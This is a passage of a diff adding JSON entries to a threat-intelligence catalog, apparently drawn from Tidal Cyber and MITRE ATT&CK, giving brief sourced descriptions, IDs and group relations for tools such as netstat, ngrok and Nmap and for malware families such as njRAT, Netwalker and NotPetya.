"803192b8-747b-4108-ae15-2d7481d39162", + "value": "netsh" + }, + { + "description": "[netstat](https://app.tidalcyber.com/software/132fb908-9f13-4bcf-aa64-74cbc72f5491) is an operating system utility that displays active TCP connections, listening ports, and network statistics. [[TechNet Netstat](https://app.tidalcyber.com/references/84ac26d8-9c7c-4c8c-bf64-a9fb4578388c)]", + "meta": { + "platforms": [], + "software_attack_id": "S0104", + "source": "MITRE", + "tags": [ + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "863b7013-133d-4a82-93d2-51b53a8fd30e", + "type": "used-by" + }, + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "used-by" + }, + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "type": "used-by" + }, + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + }, + { + "dest-uuid": "8567136b-f84a-45ed-8cce-46324c7da60e", + "type": "used-by" + }, + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", + "type": "similar" + } + ], + "uuid": "132fb908-9f13-4bcf-aa64-74cbc72f5491", + "value": "netstat" + }, + { + "description": "[NetTraveler](https://app.tidalcyber.com/software/1b8f9cf9-db8f-437d-800e-5ddd090fe30d) is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. [[Kaspersky NetTraveler](https://app.tidalcyber.com/references/a7d4b322-3710-436f-bd51-e5c258073dba)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0033", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "e343c1f1-458c-467b-bc4a-c1b97b2127e3", + "type": "used-by" + }, + { + "dest-uuid": "cafd0bf8-2b9c-46c7-ae3c-3e0f42c5062e", + "type": "similar" + } + ], + "uuid": "1b8f9cf9-db8f-437d-800e-5ddd090fe30d", + "value": "NetTraveler" + }, + { + "description": "", + "meta": { + "id": "84ef87a0-6ce9-4fcc-b96a-26bcfdabc057", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "5b4b395f-f61a-4bd6-94c1-fb45ed3cd13d", + "type": "similar" + } + ], + "uuid": "ebe1fe56-5d87-444f-bf06-76d18f19b788", + "value": "Mailto" + }, + { + "description": "", + "meta": { + "id": "ade8e593-d88a-45b7-8fce-7f9f2ce23511", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "5b4b395f-f61a-4bd6-94c1-fb45ed3cd13d", + "type": "similar" + } + ], + "uuid": "4ff19645-f405-4bc2-847b-13409fce15cf", + "value": "Koko Ransomware" + }, + { + "description": "[Netwalker](https://app.tidalcyber.com/software/5b4b395f-f61a-4bd6-94c1-fb45ed3cd13d) is fileless ransomware written in PowerShell and executed directly in memory.[[TrendMicro Netwalker May 2020](https://app.tidalcyber.com/references/ceda9ef6-e609-4a34-9db1-d2a3ebffb679)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0457", + "source": "MITRE", + "tags": [ + "242bc007-5ac5-4d96-8638-699a06d06d24", + "e554bd60-5de3-4162-9ed3-66073ae9d6b3", + "0e948c57-6c10-4576-ad27-9832cc2af3a1", + "3d90eed2-862d-4f61-8c8f-0b8da3e45af0", + "2743d495-7728-4a75-9e5f-b64854039792", + "4fb4824e-1995-4c65-8c71-e818c0aa1086", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "754effde-613c-4244-a83e-fb659b2a4d06", + "type": "similar" + }, + { + "dest-uuid": "ebe1fe56-5d87-444f-bf06-76d18f19b788", + "type": "similar" + }, + { + "dest-uuid": "4ff19645-f405-4bc2-847b-13409fce15cf", + "type": "similar" + } + ], + "uuid": "5b4b395f-f61a-4bd6-94c1-fb45ed3cd13d", + "value": "Netwalker" + }, + { + "description": "[NETWIRE](https://app.tidalcyber.com/software/c7d0e881-80a1-49ea-9c1f-b6e53cf399a8) is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012.[[FireEye APT33 Sept 2017](https://app.tidalcyber.com/references/70610469-db0d-45ab-a790-6e56309a39ec)][[McAfee Netwire Mar 2015](https://app.tidalcyber.com/references/b02fbf00-f571-4507-941d-ac1d4a8310b0)][[FireEye APT33 Webinar Sept 2017](https://app.tidalcyber.com/references/9b378592-5737-403d-8a07-27077f5b2d61)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0198", + "source": "MITRE", + "tags": [ + "6c6c0125-9631-4c2c-90ab-cfef374d5198" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "830079fe-9824-405b-93e0-c28592155c49", + "type": "used-by" + }, + { + "dest-uuid": "e47ae2a7-d34d-4528-ba67-c9c07daa91ba", + "type": "used-by" + }, + { + "dest-uuid": "1bfbb1e1-022c-57e9-b70e-711c601640be", + "type": "used-by" + }, + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "used-by" + }, + { + "dest-uuid": "2a70812b-f1ef-44db-8578-a496a227aef2", + "type": "similar" + } + ], + "uuid": "c7d0e881-80a1-49ea-9c1f-b6e53cf399a8", + "value": "NETWIRE" + }, + { + "description": "[ngrok](https://app.tidalcyber.com/software/316ecd9d-ac0b-58c7-8083-5d9214c770f6) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [ngrok](https://app.tidalcyber.com/software/316ecd9d-ac0b-58c7-8083-5d9214c770f6) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.[[Zdnet Ngrok September 2018](https://app.tidalcyber.com/references/3edb88be-2ca6-4925-ba2e-a5a4ac5f9ab0)][[FireEye Maze May 2020](https://app.tidalcyber.com/references/02338a66-6820-4505-8239-a1f1fcc60d32)][[Cyware Ngrok May 2019](https://app.tidalcyber.com/references/583a01b6-cb4e-41e7-aade-ac2fd19bda4e)][[MalwareBytes LazyScripter Feb 2021](https://app.tidalcyber.com/references/078837a7-82cd-4e26-9135-43b612e911fe)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0508", + "source": "MITRE", + "tags": [ + "6070668f-1cbd-4878-8066-c636d1d8659c", + "d8f7e071-fbfd-46f8-b431-e241bb1513ac", + "d75c1a80-0cb8-4a64-8379-10514cd44b1e", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "0060bb76-6713-4942-a4c0-d4ae01ec2866", + "type": "used-by" + }, + { + "dest-uuid": "12279b62-289e-49ee-97cb-c780edd3d091", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "07bdadce-905e-4337-898a-13e88cfb5a61", + "type": "used-by" + }, + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + }, + { + "dest-uuid": "7094468a-2310-48b5-ad24-e669152bd66d", + "type": "used-by" + }, + { + "dest-uuid": "2f7f03bb-f367-4a5a-ad9b-310a12a48906", + "type": "similar" + } + ], + "uuid": "316ecd9d-ac0b-58c7-8083-5d9214c770f6", + "value": "ngrok" + }, + { + "description": "", + "meta": { + "id": "6a4dcb7d-9358-4331-a127-d0dc5c15260b" + }, + "related": [ + { + "dest-uuid": "3ae9acd7-39f8-45c6-b557-c7d9a40eed2c", + "type": "similar" + } + ], + "uuid": "69d00742-0a78-44e9-ae0e-98d09f52d81d", + "value": "Backdoor.Nidiran" + }, + { + "description": "[Nidiran](https://app.tidalcyber.com/software/3ae9acd7-39f8-45c6-b557-c7d9a40eed2c) is a custom backdoor developed and used by [Suckfly](https://app.tidalcyber.com/groups/06549082-ff70-43bf-985e-88c695c7113c). It has been delivered via strategic web compromise. [[Symantec Suckfly March 2016](https://app.tidalcyber.com/references/8711c175-e405-4cb0-8c86-8aaa471e5573)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0118", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "06549082-ff70-43bf-985e-88c695c7113c", + "type": "used-by" + }, + { + "dest-uuid": "9e9b9415-a7df-406b-b14d-92bfe6809fbe", + "type": "similar" + }, + { + "dest-uuid": "69d00742-0a78-44e9-ae0e-98d09f52d81d", + "type": "similar" + } + ], + "uuid": "3ae9acd7-39f8-45c6-b557-c7d9a40eed2c", + "value": "Nidiran" + }, + { + "description": "[NightClub](https://app.tidalcyber.com/software/b1963876-dbdc-5beb-ace3-acb6d7705543) is a modular implant written in C++ that has been used by [MoustachedBouncer](https://app.tidalcyber.com/groups/f31df12e-66ea-5a49-87bc-2bc1756a89fc) since at least 2014.[[MoustachedBouncer ESET August 2023](https://app.tidalcyber.com/references/9070f14b-5d5e-5f6d-bcac-628478e01242)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1090", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "f31df12e-66ea-5a49-87bc-2bc1756a89fc", + "type": "used-by" + }, + { + "dest-uuid": "91c57ed3-7c32-4c68-b388-7db00cb8dac6", + "type": "similar" + } + ], + "uuid": "b1963876-dbdc-5beb-ace3-acb6d7705543", + "value": "NightClub" + }, + { + "description": "Some sources have discussed Njw0rm as a later variant of [njRAT](https://app.tidalcyber.com/software/82996f6f-0575-45cd-8f7c-ba1b063d5b9f), where Njw0rm adds the ability to spread via removable devices such as USB drives.[[FireEye Njw0rm Aug 2013](https://app.tidalcyber.com/references/062c31b1-7c1e-487f-8340-11f4b3faabc4)] Other sources contain that functionality in their description of [njRAT](https://app.tidalcyber.com/software/82996f6f-0575-45cd-8f7c-ba1b063d5b9f) itself.[[Fidelis njRAT June 2013](https://app.tidalcyber.com/references/6c985470-a923-48fd-82c9-9128b6d59bcb)][[Trend Micro njRAT 2018](https://app.tidalcyber.com/references/d8e7b428-84dd-4d96-b3f3-70e7ed7f8271)]", + "meta": { + "id": "9ee2bbd7-0b0b-4dbe-a49c-12a69c564560" + }, + "related": [ + { + "dest-uuid": "82996f6f-0575-45cd-8f7c-ba1b063d5b9f", + "type": "similar" + } + ], + "uuid": "f6269ef2-ec83-41f6-9c86-4d507070c7d7", + "value": "Njw0rm" + }, + { + "description": "[[Fidelis njRAT June 2013](https://app.tidalcyber.com/references/6c985470-a923-48fd-82c9-9128b6d59bcb)]", + "meta": { + "id": "c79396f7-6018-401e-9410-9ffffc6d219d" + }, + "related": [ + { + "dest-uuid": "82996f6f-0575-45cd-8f7c-ba1b063d5b9f", + "type": "similar" + } + ], + "uuid": "abeccf73-8340-44ca-93eb-4fbd98050cb6", + "value": "LV" + }, + { + "description": "[[Fidelis njRAT June 2013](https://app.tidalcyber.com/references/6c985470-a923-48fd-82c9-9128b6d59bcb)][[Trend Micro njRAT 2018](https://app.tidalcyber.com/references/d8e7b428-84dd-4d96-b3f3-70e7ed7f8271)]", + "meta": { + "id": "629eccba-abc2-42c1-90fd-d47334ccc1fa" + }, + "related": [ + { + "dest-uuid": "82996f6f-0575-45cd-8f7c-ba1b063d5b9f", + "type": "similar" + } + ], + "uuid": "77fe7b25-a1a1-488f-b0af-08e6e1508301", + "value": "Bladabindi" + }, + { + "description": "[njRAT](https://app.tidalcyber.com/software/82996f6f-0575-45cd-8f7c-ba1b063d5b9f) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.[[Fidelis njRAT June 2013](https://app.tidalcyber.com/references/6c985470-a923-48fd-82c9-9128b6d59bcb)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0385", + "source": "MITRE", + "tags": [ + "16b47583-1c54-431f-9f09-759df7b5ddb7", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "fcc6d937-8cd6-4f2c-adb8-48caedbde70a", + "type": "used-by" + }, + { + "dest-uuid": "b8a349a6-cde1-4d95-b20f-44c62bbfc786", + "type": "used-by" + }, + { + "dest-uuid": "12279b62-289e-49ee-97cb-c780edd3d091", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "efb3b5ac-cd86-44a2-9de1-02e4612b8cc2", + "type": "used-by" + }, + { + "dest-uuid": "1bfbb1e1-022c-57e9-b70e-711c601640be", + "type": "used-by" + }, + { + "dest-uuid": "441b91d1-256a-4763-bac6-8f1c76764a25", + "type": "used-by" + }, + { + "dest-uuid": "d906e6f7-434c-44c0-b51a-ed50af8f7945", + "type": "similar" + }, + { + "dest-uuid": "f6269ef2-ec83-41f6-9c86-4d507070c7d7", + "type": "similar" + }, + { + "dest-uuid": "abeccf73-8340-44ca-93eb-4fbd98050cb6", + "type": "similar" + }, + { + "dest-uuid": "77fe7b25-a1a1-488f-b0af-08e6e1508301", + "type": "similar" + } + ], + "uuid": "82996f6f-0575-45cd-8f7c-ba1b063d5b9f", + "value": "njRAT" + }, + { + "description": "[Nltest](https://app.tidalcyber.com/software/fbb1546a-f288-4e43-9e5c-14c94423c4f6) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.[[Nltest Manual](https://app.tidalcyber.com/references/4bb113a8-7e2c-4656-86f4-c30b08705ffa)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0359", + "source": "MITRE", + "tags": [ + "24f6ba0e-9230-4410-a9fb-b0f3b55de326", + "15787198-6c8b-4f79-bf50-258d55072fee", + "cd1b5d44-226e-4405-8985-800492cf2865", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "7c3ef21c-0e1c-43d5-afb0-3a07c5a66937", + "type": "used-by" + }, + { + "dest-uuid": "0610cd57-2511-467a-97e3-3c810384074f", + "type": "used-by" + }, + { + "dest-uuid": "6eb50f82-86cc-4eff-b1d1-66e1c6fd74f3", + "type": "used-by" + }, + { + "dest-uuid": "646e35d2-75de-4c1d-8ad3-616d3e155c5e", + "type": "used-by" + }, + { + "dest-uuid": "b3061284-0335-4dcb-9f8e-a3b0412fd46f", + "type": "used-by" + }, + { + "dest-uuid": "981acc4c-2ede-4b56-be6e-fa1a75f37acf", + "type": "similar" + } + ], + "uuid": "fbb1546a-f288-4e43-9e5c-14c94423c4f6", + "value": "Nltest" + }, + { + "description": "", + "meta": { + "id": "ef864bc2-81b9-476a-a65a-3da4e87c366b", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "042e61cf-a8e1-42ec-8974-a3b2e2037c08", + "type": "similar" + } + ], + "uuid": "b1dc73c7-6591-430b-9802-5b66758f787c", + "value": "nmap.exe" + }, + { + "description": "According to its project website, \"Nmap (\"Network Mapper\") is a free and open source utility for network discovery and security auditing\".[[Nmap: the Network Mapper](/references/65f1bbaa-8ad1-4ad5-b726-660558d27efc)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5051", + "source": "Tidal Cyber", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "6ff40d11-214a-434b-b137-993e4ff5e34e", + "15787198-6c8b-4f79-bf50-258d55072fee", + "cd1b5d44-226e-4405-8985-800492cf2865" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "7c3ef21c-0e1c-43d5-afb0-3a07c5a66937", + "type": "used-by" + }, + { + "dest-uuid": "7094468a-2310-48b5-ad24-e669152bd66d", + "type": "used-by" + }, + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "b534349f-55a4-41b8-9623-6707765c3c50", + "type": "used-by" + }, + { + "dest-uuid": "b1dc73c7-6591-430b-9802-5b66758f787c", + "type": "similar" + } + ], + "uuid": "042e61cf-a8e1-42ec-8974-a3b2e2037c08", + "value": "Nmap" + }, + { + "description": "[NOKKI](https://app.tidalcyber.com/software/31aa0433-fb6b-4290-8af5-a0d0c6c18548) is a modular remote access tool. The earliest observed attack using [NOKKI](https://app.tidalcyber.com/software/31aa0433-fb6b-4290-8af5-a0d0c6c18548) was in January 2018. [NOKKI](https://app.tidalcyber.com/software/31aa0433-fb6b-4290-8af5-a0d0c6c18548) has significant code overlap with the [KONNI](https://app.tidalcyber.com/software/d381de2a-30cb-4d50-bbce-fd1e489c4889) malware family. There is some evidence potentially linking [NOKKI](https://app.tidalcyber.com/software/31aa0433-fb6b-4290-8af5-a0d0c6c18548) to [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66).[[Unit 42 NOKKI Sept 2018](https://app.tidalcyber.com/references/f3d3b9bc-4c59-4a1f-b602-e3e884661708)][[Unit 42 Nokki Oct 2018](https://app.tidalcyber.com/references/4eea6638-a71b-4d74-acc4-0fac82ef72f6)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0353", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "used-by" + }, + { + "dest-uuid": "071d5d65-83ec-4a55-acfa-be7d5f28ba9a", + "type": "similar" + } + ], + "uuid": "31aa0433-fb6b-4290-8af5-a0d0c6c18548", + "value": "NOKKI" + }, + { + "description": "[[ESET Telebots June 2017](https://app.tidalcyber.com/references/eb5c2951-b149-4e40-bc5f-b2630213eb8b)]", + "meta": { + "id": "6309a91c-96ef-4993-8189-6fe613df2f3c" + }, + "related": [ + { + "dest-uuid": "2538e0fe-1290-4ae1-aef9-e55d83c9eb23", + "type": "similar" + } + ], + "uuid": "f9b55f54-e33d-4df3-987e-fc10919f9a4d", + "value": "Diskcoder.C" + }, + { + "description": "[[Talos Nyetya June 2017](https://app.tidalcyber.com/references/c76e806c-b0e3-4ab9-ba6d-68a9f731f127)][[ESET Telebots June 2017](https://app.tidalcyber.com/references/eb5c2951-b149-4e40-bc5f-b2630213eb8b)]", + "meta": { + "id": "8744cf46-0c4c-4ff4-aa56-a3e215f33b42" + }, + "related": [ + { + "dest-uuid": "2538e0fe-1290-4ae1-aef9-e55d83c9eb23", + "type": "similar" + } + ], + "uuid": "cfd041ef-c3f4-4a5e-92dc-4fd9b627983f", + "value": "Petrwrap" + }, + { + "description": "[[Talos Nyetya June 2017](https://app.tidalcyber.com/references/c76e806c-b0e3-4ab9-ba6d-68a9f731f127)]", + "meta": { + "id": "190a400c-3de7-4725-805f-1516a57c84d8" + }, + "related": [ + { + "dest-uuid": "2538e0fe-1290-4ae1-aef9-e55d83c9eb23", + "type": "similar" + } + ], + "uuid": "2f3dc4fc-1f8c-40e2-a241-9edd349e24d6", + "value": "GoldenEye" + }, + { + "description": "[[ESET Telebots June 2017](https://app.tidalcyber.com/references/eb5c2951-b149-4e40-bc5f-b2630213eb8b)]", + "meta": { + "id": "a83fbd63-c2eb-4c8e-9f57-8d35ab2f8867" + }, + "related": [ + { + "dest-uuid": "2538e0fe-1290-4ae1-aef9-e55d83c9eb23", + "type": "similar" + } + ], + "uuid": "544d9871-b68a-4bb1-99a4-c56777ce208e", + "value": "ExPetr" + }, + { + "description": "[[Talos Nyetya June 2017](https://app.tidalcyber.com/references/c76e806c-b0e3-4ab9-ba6d-68a9f731f127)]", + "meta": { + "id": "edd91a94-94d5-4bb7-9fc3-dbb34ea38f16" + }, + "related": [ + { + "dest-uuid": "2538e0fe-1290-4ae1-aef9-e55d83c9eb23", + "type": "similar" + } + ], + "uuid": "2b7f9965-810d-4018-905d-8530af166fb6", + "value": "Nyetya" + }, + { + "description": "[NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) is malware that was used by [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.[[Talos Nyetya June 2017](https://app.tidalcyber.com/references/c76e806c-b0e3-4ab9-ba6d-68a9f731f127)][[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)][[ESET Telebots June 2017](https://app.tidalcyber.com/references/eb5c2951-b149-4e40-bc5f-b2630213eb8b)][[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0368", + "source": "MITRE", + "tags": [ + "09de661e-60c4-43fb-bfef-df017215d1d8", + "5a463cb3-451d-47f7-93e4-1886150697ce", + "c2380542-36f2-4922-9ed2-80ced06645c9", + "7e7b0c67-bb85-4996-a289-da0e792d7172", + "e809d252-12cc-494d-94f5-954c49eb87ce" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "5719af9d-6b16-46f9-9b28-fb019541ddbb", + "type": "similar" + }, + { + "dest-uuid": "f9b55f54-e33d-4df3-987e-fc10919f9a4d", + "type": "similar" + }, + { + "dest-uuid": "cfd041ef-c3f4-4a5e-92dc-4fd9b627983f", + "type": "similar" + }, + { + "dest-uuid": "2f3dc4fc-1f8c-40e2-a241-9edd349e24d6", + "type": "similar" + }, + { + "dest-uuid": "544d9871-b68a-4bb1-99a4-c56777ce208e", + "type": "similar" + }, + { + "dest-uuid": "2b7f9965-810d-4018-905d-8530af166fb6", + "type": "similar" + } + ], + "uuid": "2538e0fe-1290-4ae1-aef9-e55d83c9eb23", + "value": "NotPetya" + }, + { + "description": "", + "meta": { + "id": "398de5c7-6134-4602-9bff-5a5c02e307e4", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "d1817595-9186-4749-aeab-26c774c1885d", + "type": "similar" + } + ], + "uuid": "ed19a544-699c-43c2-a3bb-4503b220354f", + "value": "npcap.exe" + }, + { + "description": "According to its project website, \"Npcap is the Nmap Project's packet capture (and sending) library for Microsoft Windows\".[[Npcap: Windows Packet Capture Library & Driver](/references/c8dc5650-eb37-4bb6-b5b7-e6269c79785c)] Nmap is a utility used for network discovery and security auditing.", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5052", + "source": "Tidal Cyber", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "cd1b5d44-226e-4405-8985-800492cf2865" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "ed19a544-699c-43c2-a3bb-4503b220354f", + "type": "similar" + } + ], + "uuid": "d1817595-9186-4749-aeab-26c774c1885d", + "value": "Npcap" + }, + { + "description": "", + "meta": { + "id": "62444fc5-9c72-4a6c-b1ae-90bc0b63bf0a", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "9af571bb-f3c7-434b-8187-3e4ceb0ec6fc", + "type": "similar" + } + ], + "uuid": "39494b87-38c0-4b84-89c9-3bcd45f3bc3f", + "value": "ntdsutil.exe" + }, + { + "description": "Ntdsutil is a Windows command-line tool \"that provides management facilities for Active Directory Domain Services (AD DS) and Active Directory Lightweight Directory Services (AD LDS).\"[[Ntdsutil Microsoft](/references/34de2f08-0481-4894-80ef-86506d821cf0)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5018", + "source": "Tidal Cyber", + "tags": [ + "1da5eb1e-7ac5-4284-99cb-ce227cad8983", + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + }, + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "ca93af75-0ffa-4df4-b86a-92d4d50e496e", + "type": "used-by" + }, + { + "dest-uuid": "0060bb76-6713-4942-a4c0-d4ae01ec2866", + "type": "used-by" + }, + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "39494b87-38c0-4b84-89c9-3bcd45f3bc3f", + "type": "similar" + } + ], + "uuid": "9af571bb-f3c7-434b-8187-3e4ceb0ec6fc", + "value": "Ntdsutil" + }, + { + "description": "[ObliqueRAT](https://app.tidalcyber.com/software/97e8148c-e146-444c-9de5-6e2fdbda2f9f) is a remote access trojan, similar to [Crimson](https://app.tidalcyber.com/software/3b3f296f-20a6-459a-98c5-62ebdee3701f), that has been in use by [Transparent Tribe](https://app.tidalcyber.com/groups/441b91d1-256a-4763-bac6-8f1c76764a25) since at least 2020.[[Talos Oblique RAT March 2021](https://app.tidalcyber.com/references/20e13efb-4ca1-43b2-83a6-c852e03333d7)][[Talos Transparent Tribe May 2021](https://app.tidalcyber.com/references/5d58c285-bc7d-4a8a-a96a-ac7118c1089d)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0644", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "441b91d1-256a-4763-bac6-8f1c76764a25", + "type": "used-by" + }, + { + "dest-uuid": "5864e59f-eb4c-43ad-83b2-b5e4fae056c9", + "type": "similar" + } + ], + "uuid": "97e8148c-e146-444c-9de5-6e2fdbda2f9f", + "value": "ObliqueRAT" + }, + { + "description": "[OceanSalt](https://app.tidalcyber.com/software/f1723994-058b-4525-8e11-2f0c80d8f3a4) is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. [OceanSalt](https://app.tidalcyber.com/software/f1723994-058b-4525-8e11-2f0c80d8f3a4) shares code similarity with [SpyNote RAT](https://app.tidalcyber.com/software/), which has been linked to [APT1](https://app.tidalcyber.com/groups/5307bba1-2674-4fbd-bfd5-1db1ae06fc5f).[[McAfee Oceansalt Oct 2018](https://app.tidalcyber.com/references/04b475ab-c7f6-4373-a4b0-04b5d8028f95)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0346", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "288fa242-e894-4c7e-ac86-856deedf5cea", + "type": "similar" + } + ], + "uuid": "f1723994-058b-4525-8e11-2f0c80d8f3a4", + "value": "OceanSalt" + }, + { + "description": "[Octopus](https://app.tidalcyber.com/software/8f04e609-8773-4529-b247-d32f530cc453) 